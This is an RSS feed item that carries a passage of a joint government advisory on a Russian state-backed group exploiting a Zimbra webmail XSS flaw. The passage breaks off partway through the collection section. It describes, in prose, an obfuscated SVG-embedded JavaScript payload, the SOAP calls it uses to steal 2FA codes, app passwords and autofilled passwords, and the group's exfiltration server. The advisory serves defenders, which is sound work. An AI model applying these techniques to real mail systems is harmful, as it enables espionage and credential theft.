<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=takeaways+from+ciscos+summit%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 22:01:26 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 22:01:26 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=takeaways+from+ciscos+summit%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=takeaways+from+ciscos+summit%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
<li>Newly-created Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank">T1098</a>].</li>
</ul>
<p>The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.</p>
<h2><strong>Targeting details</strong></h2>
<p>LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:</p>
<ul>
<li>the Defense Industrial Base (DIB),  </li>
<li>the federal and local government,</li>
<li>education,</li>
<li>energy,</li>
<li>law enforcement,  </li>
<li>media,  </li>
<li>non-governmental organizations, and</li>
<li>technology.</li>
</ul>
<h2><strong>Technical details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 19. This advisory also uses <a href="https://d3fend.mitre.org/" target="_blank">MITRE D3FEND<sup>TM</sup></a> version 1.4.0<a href="https://www.cisa.gov/#f15"><sup>15</sup></a>. See <a href="https://www.cisa.gov/#appendixa">Appendix A</a> and <a href="https://www.cisa.gov/#appendixb">Appendix B</a> for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.</p>
<p><em>Ulej </em>is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> [Common Weakness Enumeration (CWE) <a href="https://cwe.mitre.org/data/definitions/79.html" target="_blank">CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'</a>)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank">T1074.002</a>] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.</p>
<h3><em><strong>Reconnaissance</strong></em></h3>
<p>LAUNDRY BEAR uses the <em>Ulej </em>capability to exploit the <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [<a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank">T1595</a>] and fingerprinting datasets easily procured through various commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank">T1596.005</a>].  </p>
<p>After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank">T1589.002</a>] from datasets offered by commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank">T1597.002</a>], open source intelligence [<a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank">T1593</a>], or previously exfiltrated data [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank">T1597</a>].  </p>
<h3><em><strong>Resource development </strong></em><a class="ck-anchor"></a></h3>
<p>The actors procure VPSs from a variety of providers [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank">T1583.003</a>], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/">T1583</a>] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for <em>Ulej’s</em> Flowerbed framework [<a href="https://attack.mitre.org/versions/v19/techniques/T1608/">T1608</a>], which then receives and aggregates the data <em>Ulej</em> exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.</p>
<h4><strong>Flowerbed framework</strong></h4>
<p>Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:</p>
<ul>
<li>Catcher,</li>
<li>Certbot,</li>
<li>Nginx, and</li>
<li>Gardener.</li>
</ul>
<p>Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/">T1048</a>]. For additional information on Catcher, refer to the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank">T1048.002</a>]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.</p>
<p>The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank">T1588.007</a>]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank">T1588.002</a>], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.</p>
<h3><em><strong>Initial access</strong></em></h3>
<p>To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [<a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank">T1566</a>]. Through exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, this JavaScript payload is immediately executed once the user views the malicious email [<a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank">T1203</a>], such as the one shown in <a href="https://www.cisa.gov/#figure1"><strong>Figure 1</strong></a>, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through compromised accounts [<a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank">T1199</a>], as shown in the email metadata in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure1.png?itok=yrzcl7tK" width="604" height="235" alt="Figure 1: Example of malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 1: Example of malicious email</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure2.png?itok=vEulmmyx" width="604" height="102" alt="Figure 2: Headers from an example malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 2: Headers from an example malicious email</strong></em></figcaption>
  </figure>
<p>According to the National Vulnerability Database (NVD), <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66376" target="_blank">CVE-2025-66376</a> was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet’s (CSS) @import directives within an email [<a href="https://www.cisa.gov/#wc5">5</a>]. Because the activity attributed to this campaign began in July 2025—months before Synacor released a patch and the CVE was published—the payload initially exploited a zero-day vulnerability at that time [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank">T1587.004</a>].  </p>
<p><strong>Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.</strong></p>
<p>Hidden in LAUNDRY BEAR’s email is a Base64 encoded payload within the “onload” field of a Scalable Vector Graphics (SVG) element [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank">T1027.017</a>], as shown in <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a>. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>) [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank">T1027.013</a>]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank">T1027.010</a>], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [<a href="https://attack.mitre.org/versions/v19/techniques/T1119/">T1119</a>]. The stages in order of appearance within the payload are as follows:</p>
<ol>
<li>sendStartPing,</li>
<li>gather_email,</li>
<li>gather_environment,</li>
<li>gather_2fa_codes,</li>
<li>gather_app_password,</li>
<li>gather_device_status,</li>
<li>gather_oauth_consumers,</li>
<li>gather_autocomplete_password,</li>
<li>enable_mail_protocols,</li>
<li>gather_gal,</li>
<li>sendArchives, and</li>
<li>sendFinishPing. </li>
</ol>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure3_0.png?itok=M-bj5-nb" width="607" height="577" alt="Figure 3: Malicious payload of example email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 3: Malicious payload of example email</strong></em></figcaption>
  </figure>
<p>Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank">T1587</a>].</p>
<h3><em><strong>Persistence and credential access</strong></em><a class="ck-anchor"></a></h3>
<p>To establish sustained persistence into the victim’s email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group’s ability to circumvent multi-factor authentication through session token replay [<a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank">T1550.004</a>], and the Zimbra campaign follows a similar trend.</p>
<p>The script used in this campaign tries to discover the victim’s email address during the <em>gather_email</em> stage [<a href="https://attack.mitre.org/techniques/T1087/" target="_blank">T1087</a>]. The script searches for this email address in two ways. First, it examines the <em>batchInfoResponse </em>variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory. If so, the script uses the “GetIdentitiesRequest” Simple Object Access Protocol (SOAP) command under the “ZimbraAccount” namespace to determine the victim’s email address [<a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank">T1185</a>] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim’s email, the script sends a JavaScript Object Notation (JSON) payload with a key of “email” and value of <em>null </em>over HTTPS and does not attempt DNS exfiltration.</p>
<p>During the <em>gather_autocomplete_password</em> stage, the script attempts to collect the victim’s saved password via the autocomplete feature of the victim’s password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim’s view, as shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a><strong> </strong>and <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a>. If there is no value in that input field, it checks the password input field shown in <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. If neither input field contains a value, a JSON payload with a key of “autocomplete_password” and value of <em>null </em>is sent over HTTPS and DNS exfiltration is not attempted.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure4.png?itok=ZOZ8JHZC" width="1024" height="188" alt="Figure 4: First illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 4: First illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure5.png?itok=8xZU_GCa" width="1024" height="115" alt="Figure 5: Second illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 5: Second illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p>LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim’s mailbox. During the <em>enable_mail_protocols</em> stage, a SOAP request leveraging the “ModifyPrefsRequest” command under the “ZimbraAccount” namespace is sent. This request attempts to set the “zimbraPrefImapEnabled” preference to TRUE. While the default setting for “zimbraPrefImapEnabled” is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim’s mailbox is enabled.</p>
<p>ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the <em>gather_app_password</em> stage, the script makes a SOAP request using the “CreateAppSpecificPasswordRequest” command under the “ZimbraAccount” namespace to create a new Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank">T1556.006</a>]. The SOAP request uses “ZimbraWeb” as the name of the application.</p>
<p>Additionally, the script also attempts to collect 2FA tokens. During the <em>gather_2fa_codes</em> stage, the script makes a SOAP request using the “GetScratchCodesRequest” command under the “ZimbraAccount” namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually.</p>
<h3><em><strong>Collection</strong></em><a class="ck-anchor"></a></h3>
<p>As demonstrated in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim’s current CSRF token, which it attempts to access within the webpage’s local storage using localStorage.getItem("csrfToken"). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, other SOAP commands executed to collect victim information are shown in <a href="https://www.cisa.gov/#table1"><strong>Table 1</strong></a>.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 1: Additional SOAP commands used</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>SOAP Command </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Namespace </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Stage </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraSync </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>SearchGalRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script attempts to collect the victim’s GAL through brute force by searching for each two-character combination from a character set of “abcdefghijklmnopqrstuvwxyz1234567890.-_”. These queries are conducted using 20 batches of SOAP requests with 77 “SearchGalRequest” SOAP commands in each batch except for the last request containing only 58.</p>
